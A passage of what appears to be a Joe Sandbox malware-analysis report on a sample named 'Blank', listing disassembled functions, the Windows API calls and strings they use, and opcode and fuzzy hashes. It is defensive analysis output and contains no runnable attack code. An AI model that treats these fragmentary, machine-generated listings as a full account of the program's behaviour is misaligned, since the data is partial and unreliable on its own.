                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                                    • Opcode ID: ca39889e27a42e0d2ea3a575ebafbe6d20d69367ead4e0202cd38234de50e8ab
                                                                                                                                    • Instruction ID: 2d3a659c4a2b3f7baa4a0283c891baa814b0a32d1c68a743b37c6b2a2e1b11e2
                                                                                                                                    • Opcode Fuzzy Hash: ca39889e27a42e0d2ea3a575ebafbe6d20d69367ead4e0202cd38234de50e8ab
                                                                                                                                    • Instruction Fuzzy Hash: 1C919E346647019BCB05FF21C491AA9B7A1AF88354F50886DF8965B3A2CB31ED69CF81
                                                                                                                                    Function 002CE25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 002CE31F
                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 002CE32F
                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002CE33B
                                                                                                                                    • __wsplitpath.LIBCMT ref: 002CE399
                                                                                                                                    • _wcscat.LIBCMT ref: 002CE3B1
                                                                                                                                    • _wcscat.LIBCMT ref: 002CE3C3
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002CE3D8
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002CE3EC
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002CE41E
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002CE43F
                                                                                                                                    • _wcscpy.LIBCMT ref: 002CE44B
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002CE48A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 3566783562-438819550
                                                                                                                                    • Opcode ID: 5b3ade78f2c32e02d33ffe833b8297c8107dbe419267e2ec9979632cc44be0db
                                                                                                                                    • Instruction ID: 5703b950fd2c9b6600368f65ff21106e60198064adf364d86030be70d2d90490
                                                                                                                                    • Opcode Fuzzy Hash: 5b3ade78f2c32e02d33ffe833b8297c8107dbe419267e2ec9979632cc44be0db
                                                                                                                                    • Instruction Fuzzy Hash: 14617C725242459FCB10EF60C884EAEB3E8FF89310F044A1EF98987251DB35E955CF92
                                                                                                                                    Function 002EBE93 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182windowlibraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002EBF26
                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032), ref: 002EBF82
                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002EBFBB
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002EBFFE
                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002EC035
                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000032), ref: 002EC041
                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002EC051
                                                                                                                                    • DestroyIcon.USER32(00000000), ref: 002EC060
                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002EC07D
                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002EC089
                                                                                                                                      • Part of subcall function 0028312D: __wcsicmp_l.LIBCMT ref: 002831B6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                    • API String ID: 1212759294-1154884017
                                                                                                                                    • Opcode ID: cda73269ff1156efcb905e5b8af09762e0728b07dc5821fe460aa49c3c2fb58b
                                                                                                                                    • Instruction ID: 1de20266af7109d56ed87ba7af197f65bf4ba7357592296d07e866dfc83afeb6
                                                                                                                                    • Opcode Fuzzy Hash: cda73269ff1156efcb905e5b8af09762e0728b07dc5821fe460aa49c3c2fb58b
                                                                                                                                    • Instruction Fuzzy Hash: 9E5137719A0255FEEB15DF65DC45BBE77A8FB08B20F104215F815D60C1DBB0A9A0CFA0
                                                                                                                                    Function 002CA27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002CA2C2
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002CA2E3
                                                                                                                                    • __swprintf.LIBCMT ref: 002CA33C
                                                                                                                                    • __swprintf.LIBCMT ref: 002CA355
                                                                                                                                    • _wprintf.LIBCMT ref: 002CA3FC
                                                                                                                                    • _wprintf.LIBCMT ref: 002CA41A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                    • API String ID: 311963372-3080491070
                                                                                                                                    • Opcode ID: 436652f49e22fc877118f7267d28f6a67391f89a50d065638d313cb45142589b
                                                                                                                                    • Instruction ID: a7d0561b85abc1cfc4f672794c6450492027a447329d63e94e3193074911a846
                                                                                                                                    • Opcode Fuzzy Hash: 436652f49e22fc877118f7267d28f6a67391f89a50d065638d313cb45142589b
                                                                                                                                    • Instruction Fuzzy Hash: 8051C771911119AACF29EBE4CD46EEEB779AF04340F104269F509B2052DB352F79CF61
                                                                                                                                    Function 002C0065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,?,?,002AF8B8,00000001,0000138C,00000001,?,00000001,?,002D3FF9,?), ref: 002C009A
                                                                                                                                    • LoadStringW.USER32(00000000,?,002AF8B8,00000001), ref: 002C00A3
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00327310,?,00000FFF,?,?,002AF8B8,00000001,0000138C,00000001,?,00000001,?,002D3FF9,?,00000001), ref: 002C00C5
                                                                                                                                    • LoadStringW.USER32(00000000,?,002AF8B8,00000001), ref: 002C00C8
                                                                                                                                    • __swprintf.LIBCMT ref: 002C0118
                                                                                                                                    • __swprintf.LIBCMT ref: 002C0129
                                                                                                                                    • _wprintf.LIBCMT ref: 002C01D2
                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002C01E9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                    • API String ID: 984253442-2268648507
                                                                                                                                    • Opcode ID: 3f164a7eebf904e288d63e8098bcb3f4b26f9b25272c957b626a9a2df7ccacc5
                                                                                                                                    • Instruction ID: 991688183ad87530fbb4f4c0203d5b714ee4a0e5abcdbf880d927d46899cd83a
                                                                                                                                    • Opcode Fuzzy Hash: 3f164a7eebf904e288d63e8098bcb3f4b26f9b25272c957b626a9a2df7ccacc5
                                                                                                                                    • Instruction Fuzzy Hash: 00416072810119AACF15FBD4CD96EEEB778AF18341F104129F509B2092DA706F79CF61
                                                                                                                                    Function 002CA995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00264D37: __itow.LIBCMT ref: 00264D62
                                                                                                                                      • Part of subcall function 00264D37: __swprintf.LIBCMT ref: 00264DAC
                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 002CAA0E
                                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 002CAA5B
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000, type cdaudio alias cd wait,?,open ), ref: 002CAAA3
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000, wait,?,set cd door ), ref: 002CAADA
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000,close cd wait), ref: 002CAB08
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                    • API String ID: 2698844021-4113822522
                                                                                                                                    • Opcode ID: a8f8f02937b91e52112a2159166f521aa986755b34bdb9be68c35738719c8a24
                                                                                                                                    • Instruction ID: 1200fb90c2fc1fe7f7e80f5e43b68212b42225c48435f3c0da20f43fa4a4821a
                                                                                                                                    • Opcode Fuzzy Hash: a8f8f02937b91e52112a2159166f521aa986755b34bdb9be68c35738719c8a24
                                                                                                                                    • Instruction Fuzzy Hash: BE515B711142059FC305EF14C88196AB3F8FF98758F10896DF899972A1DB31AE29CF52
                                                                                                                                    Function 002CA832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002CA852
                                                                                                                                    • __swprintf.LIBCMT ref: 002CA874
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 002CA8B1
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002CA8D6
                                                                                                                                    • _memset.LIBCMT ref: 002CA8F5
                                                                                                                                    • _wcsncpy.LIBCMT ref: 002CA931
                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002CA966
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CA971
                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 002CA97A
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CA984
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                    • API String ID: 2733774712-3457252023
                                                                                                                                    • Opcode ID: cadc43b9a5f40778a12f1253371b453b30ff95c8e2e7b9df0e01f52c3c574b7b
                                                                                                                                    • Instruction ID: 253c0028f0b966231a7455b00d7741cf99e37d309739c566f45675eb7c585a70
                                                                                                                                    • Opcode Fuzzy Hash: cadc43b9a5f40778a12f1253371b453b30ff95c8e2e7b9df0e01f52c3c574b7b
                                                                                                                                    • Instruction Fuzzy Hash: 8031CE7151010AABDB209FA0DC89FFB73BCEF88744F1042BAF909D21A1E7709654CB24
                                                                                                                                    Function 002EC0A5 Relevance: 22.6, APIs: 15, Instructions: 130filememorywindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002E982C,?,?), ref: 002EC0C8
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002E982C,?,?,00000000,?), ref: 002EC0DF
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002E982C,?,?,00000000,?), ref: 002EC0EA
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,002E982C,?,?,00000000,?), ref: 002EC0F7
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 002EC100
                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002E982C,?,?,00000000,?), ref: 002EC10F
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002EC118
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,002E982C,?,?,00000000,?), ref: 002EC11F
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002E982C,?,?,00000000,?), ref: 002EC130
                                                                                                                                    • #418.OLEAUT32(?,00000000,00000000,002F3C7C,?,?,?,?,?,002E982C,?,?,00000000,?), ref: 002EC149
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 002EC159
                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 002EC17D
                                                                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 002EC1A8
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002EC1D0
                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002EC1E6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2779716855-0
                                                                                                                                    • Opcode ID: e9d2ec985d3ca6d4ab77031f157cd70b65967335ef8d46a7726784a8c78f35fc
                                                                                                                                    • Instruction ID: e72b247397e7310d96095260625292a8f6f30da1f92587abd6f6cdf271c5c137
                                                                                                                                    • Opcode Fuzzy Hash: e9d2ec985d3ca6d4ab77031f157cd70b65967335ef8d46a7726784a8c78f35fc
                                                                                                                                    • Instruction Fuzzy Hash: E6415B75640249EFCB118FA5DC8CEBE7BB8EF89761F104068F90AEB261C7319951DB60
                                                                                                                                    Function 002CDEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __wsplitpath.LIBCMT ref: 002CE053
                                                                                                                                    • _wcscat.LIBCMT ref: 002CE06B
                                                                                                                                    • _wcscat.LIBCMT ref: 002CE07D
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002CE092
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002CE0A6
                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 002CE0BE
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 002CE0D8
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002CE0EA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 34673085-438819550
                                                                                                                                    • Opcode ID: 3712635310293f898624142b2b6f0c8d7136e8ec8d2da7662ecac3ffd4d0da6d
                                                                                                                                    • Instruction ID: 1e6adb10ce0b83049c7b4037bb13dd2d621f2fa2fec110bf3656b01c5bbc5244
                                                                                                                                    • Opcode Fuzzy Hash: 3712635310293f898624142b2b6f0c8d7136e8ec8d2da7662ecac3ffd4d0da6d
                                                                                                                                    • Instruction Fuzzy Hash: CE8194715242429FCB20EF24C884E6AB7E8BF99310F18893EF48AC7651E774DD64CB52
                                                                                                                                    Function 002EC854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629E2: GetWindowLongW.USER32(?,000000EB), ref: 002629F3
                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002EC8A4
                                                                                                                                    • GetFocus.USER32 ref: 002EC8B4
                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 002EC8BF
                                                                                                                                    • _memset.LIBCMT ref: 002EC9EA
                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002ECA15
                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 002ECA35
                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 002ECA48
                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002ECA7C
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002ECAC4
                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002ECAFC
                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002ECB31
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                                    • Opcode ID: 46a921dd70ab265ca8bedda5bd331bf81a5ca74974e6218c1089933bb447ff27
                                                                                                                                    • Instruction ID: 710be17d0dc6ded76bd310aef6ba2a95f2114dc4968124f84a6dbff38b9143a3
                                                                                                                                    • Opcode Fuzzy Hash: 46a921dd70ab265ca8bedda5bd331bf81a5ca74974e6218c1089933bb447ff27
                                                                                                                                    • Instruction Fuzzy Hash: D081CE702583829FD710CF55D885A6BBBE8FF88354F60492DF98593292C770D826CFA2
                                                                                                                                    Function 002B8ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002B8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002B8E3C
                                                                                                                                      • Part of subcall function 002B8E20: GetLastError.KERNEL32(?,002B8900,?,?,?), ref: 002B8E46
                                                                                                                                      • Part of subcall function 002B8E20: GetProcessHeap.KERNEL32(00000008,?,?,002B8900,?,?,?), ref: 002B8E55
                                                                                                                                      • Part of subcall function 002B8E20: HeapAlloc.KERNEL32(00000000,?,002B8900,?,?,?), ref: 002B8E5C
                                                                                                                                      • Part of subcall function 002B8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002B8E73
                                                                                                                                      • Part of subcall function 002B8EBD: GetProcessHeap.KERNEL32(00000008,002B8916,00000000,00000000,?,002B8916,?), ref: 002B8EC9
                                                                                                                                      • Part of subcall function 002B8EBD: HeapAlloc.KERNEL32(00000000,?,002B8916,?), ref: 002B8ED0
                                                                                                                                      • Part of subcall function 002B8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002B8916,?), ref: 002B8EE1
                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002B8B2E
                                                                                                                                    • _memset.LIBCMT ref: 002B8B43
                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002B8B62
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 002B8B73
